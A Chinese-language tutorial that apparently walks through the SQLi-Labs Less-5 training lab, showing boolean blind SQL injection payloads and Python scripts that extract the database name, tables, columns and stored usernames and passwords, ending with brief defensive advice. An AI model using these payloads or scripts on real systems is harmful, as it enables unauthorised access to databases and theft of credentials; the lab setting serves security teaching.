SQL注入实战教学：SQLi-Labs Less-5 布尔盲注详解<\/h1>

一、关卡概述<\/h2>
SQLi-Labs Less-5 是一个典型的布尔盲注(Boolean-based Blind SQL Injection)练习环境。与之前的关卡不同，这一关的特点是：<\/p>
无论SQL查询是否正确，页面只会有两种响应状态：
查询成功时显示"You are in"<\/li>
查询失败时无特殊显示<\/li> <\/ul> <\/li>
无法直接通过页面回显获取查询结果<\/li>
传统的UNION联合查询注入方式在此不适用<\/li> <\/ol>
二、代码审计分析<\/h2>
通过分析后端代码（虽然未直接展示但可通过行为推断）：<\/p>
应用程序接收id<\/code>参数并直接拼接到SQL查询中<\/li>
查询结果只用于判断是否显示特定消息，不直接输出数据<\/li>
存在SQL注入漏洞但无直接回显通道<\/li>
<\/ul>
三、布尔盲注原理<\/h2>
布尔盲注是一种基于条件响应的注入技术，通过构造真\/假条件并观察应用程序的不同响应来推断信息。<\/p>
基本流程：<\/p>

构造一个条件查询，如id=1' and 1=1 -- <\/code><\/li>
观察正常响应<\/li>
构造id=1' and 1=2 -- <\/code><\/li>
观察异常响应<\/li>
通过比较差异逐步推断数据库信息<\/li>
<\/ol>
四、实战步骤详解<\/h2>
1. 确定注入点<\/h3>
基本测试：<\/p>
?id=1' -- 
?id=1" -- 
?id=1' and 1=1 -- 
?id=1' and 1=2 -- 
<\/code><\/pre>
观察哪些语句触发"You are in"响应，确认单引号是有效闭合方式。<\/p>
2. 确定列数<\/h3>
虽然UNION不可用，但确定列数仍有参考价值：<\/p>
?id=1' order by 3 -- 
?id=1' order by 4 -- 
<\/code><\/pre>
通过响应变化确定列数为3。<\/p>
3. 数据库名爆破<\/h3>
方法一：手工注入<\/h4>
(1) 确定数据库名长度：<\/p>
?id=1' and length(database())=8 -- 
<\/code><\/pre>
(2) 逐字符猜解数据库名：<\/p>
?id=1' and substr(database(),1,1)='s' -- 
?id=1' and ascii(substr(database(),1,1))=115 -- 
<\/code><\/pre>
方法二：使用Python脚本自动化<\/h4>
import<\/span> requests
<\/span><\/span>
<\/span><\/span># 配置部分<\/span>
<\/span><\/span>url =<\/span> "http:\/\/192.168.1.200:5151\/sqlilabs\/Less-5"<\/span>
<\/span><\/span>payload_len =<\/span> "?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=<\/span>{n}<\/span> -- a"<\/span>
<\/span><\/span>payload_str =<\/span> "?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),<\/span>{n}<\/span>,1))=<\/span>{r}<\/span> -- a"<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> get_length<\/span>(url, payload):
<\/span><\/span>    length =<\/span> 1<\/span>
<\/span><\/span>    while<\/span> True<\/span>:
<\/span><\/span>        response =<\/span> requests.<\/span>get(url +<\/span> payload.<\/span>format(n=<\/span>length))
<\/span><\/span>        if<\/span> 'You are in'<\/span> in<\/span> response.<\/span>text:
<\/span><\/span>            print(f<\/span>"长度确定: <\/span>{<\/span>length}<\/span>"<\/span>)
<\/span><\/span>            return<\/span> length
<\/span><\/span>        print(f<\/span>"测试长度: <\/span>{<\/span>length}<\/span>"<\/span>)
<\/span><\/span>        length +=<\/span> 1<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> get_string<\/span>(url, payload, length):
<\/span><\/span>    result =<\/span> ''<\/span>
<\/span><\/span>    for<\/span> l in<\/span> range(1<\/span>, length+<\/span>1<\/span>):
<\/span><\/span>        for<\/span> n in<\/span> range(33<\/span>, 126<\/span>):
<\/span><\/span>            response =<\/span> requests.<\/span>get(url +<\/span> payload.<\/span>format(n=<\/span>l, r=<\/span>n))
<\/span><\/span>            if<\/span> 'You are in'<\/span> in<\/span> response.<\/span>text:
<\/span><\/span>                result +=<\/span> chr(n)
<\/span><\/span>                print(f<\/span>"第<\/span>{<\/span>l}<\/span>个字符: <\/span>{<\/span>chr(n)}<\/span> | 当前结果: <\/span>{<\/span>result}<\/span>"<\/span>)
<\/span><\/span>                break<\/span>
<\/span><\/span>    return<\/span> result
<\/span><\/span>
<\/span><\/span># 执行爆破<\/span>
<\/span><\/span>length =<\/span> get_length(url, payload_len)
<\/span><\/span>result =<\/span> get_string(url, payload_str, length)
<\/span><\/span>print(f<\/span>"最终结果: <\/span>{<\/span>result}<\/span>"<\/span>)
<\/span><\/span><\/code><\/pre>4. 表名爆破<\/h3>
修改payload获取表名：<\/p>
payload_len =<\/span> "?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=<\/span>{n}<\/span> -- a"<\/span>
<\/span><\/span>payload_str =<\/span> "?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),<\/span>{n}<\/span>,1))=<\/span>{r}<\/span> -- a"<\/span>
<\/span><\/span><\/code><\/pre>5. 列名爆破<\/h3>
获取指定表(如users)的列名：<\/p>
payload_len =<\/span> "?id=1' and length((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()))=<\/span>{n}<\/span> -- a"<\/span>
<\/span><\/span>payload_str =<\/span> "?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()),<\/span>{n}<\/span>,1))=<\/span>{r}<\/span> -- a"<\/span>
<\/span><\/span><\/code><\/pre>6. 数据爆破<\/h3>
获取users表中的数据：<\/p>
payload_len =<\/span> "?id=1' and length((select group_concat(username,':',password) from users))=<\/span>{n}<\/span> -- a"<\/span>
<\/span><\/span>payload_str =<\/span> "?id=1' and ascii(substr((select group_concat(username,':',password) from users),<\/span>{n}<\/span>,1))=<\/span>{r}<\/span> -- a"<\/span>
<\/span><\/span><\/code><\/pre>五、关键函数说明<\/h2>

length()<\/code>: 返回字符串长度<\/li>
substr(str,pos,len)<\/code>: 截取字符串

str: 要截取的字符串<\/li>
pos: 开始位置(从1开始)<\/li>
len: 截取长度<\/li>
<\/ul>
<\/li>
ascii()<\/code>: 返回字符的ASCII码<\/li>
group_concat()<\/code>: 将多行结果合并为单个字符串<\/li>
<\/ol>
六、效率优化技巧<\/h2>

使用二分法代替线性搜索：<\/li>
<\/ol>
def<\/span> get_char<\/span>(url, pos):
<\/span><\/span>    low =<\/span> 32<\/span>
<\/span><\/span>    high =<\/span> 126<\/span>
<\/span><\/span>    while<\/span> low <=<\/span> high:
<\/span><\/span>        mid =<\/span> (low +<\/span> high) \/\/<\/span> 2<\/span>
<\/span><\/span>        payload =<\/span> f<\/span>"?id=1' and ascii(substr((select database()),<\/span>{<\/span>pos}<\/span>,1))><\/span>{<\/span>mid}<\/span> -- a"<\/span>
<\/span><\/span>        response =<\/span> requests.<\/span>get(url +<\/span> payload)
<\/span><\/span>        if<\/span> 'You are in'<\/span> in<\/span> response.<\/span>text:
<\/span><\/span>            low =<\/span> mid +<\/span> 1<\/span>
<\/span><\/span>        else<\/span>:
<\/span><\/span>            high =<\/span> mid -<\/span> 1<\/span>
<\/span><\/span>    return<\/span> chr(low)
<\/span><\/span><\/code><\/pre>
使用Burp Suite Intruder进行爆破

设置攻击类型为"Cluster bomb"<\/li>
第一个payload设置位置参数(1,2,3...)<\/li>
第二个payload设置ASCII值范围(32-126)<\/li>
根据响应长度\/内容过滤结果<\/li>
<\/ul>
<\/li>
<\/ol>
七、常见问题解决<\/h2>


VMware网络问题：<\/p>

确保使用NAT或桥接模式<\/li>
检查虚拟网络编辑器设置<\/li>
参考解决方案：VMware网络配置指南<\/a><\/li>
<\/ul>
<\/li>

脚本不工作可能原因：<\/p>

URL或payload格式错误<\/li>
特殊字符需要URL编码<\/li>
网络连接问题<\/li>
目标服务未启动<\/li>
<\/ul>
<\/li>
<\/ol>
八、防御建议<\/h2>

使用参数化查询(Prepared Statements)<\/li>
实施最小权限原则<\/li>
对输入进行严格过滤和验证<\/li>
禁用错误详细信息的显示<\/li>
使用Web应用防火墙(WAF)<\/li>
<\/ol>
通过本教程，您应该掌握了布尔盲注的基本原理和实战方法。这种技术适用于无直接回显但存在条件响应的SQL注入场景，是渗透测试中的重要技能。<\/p>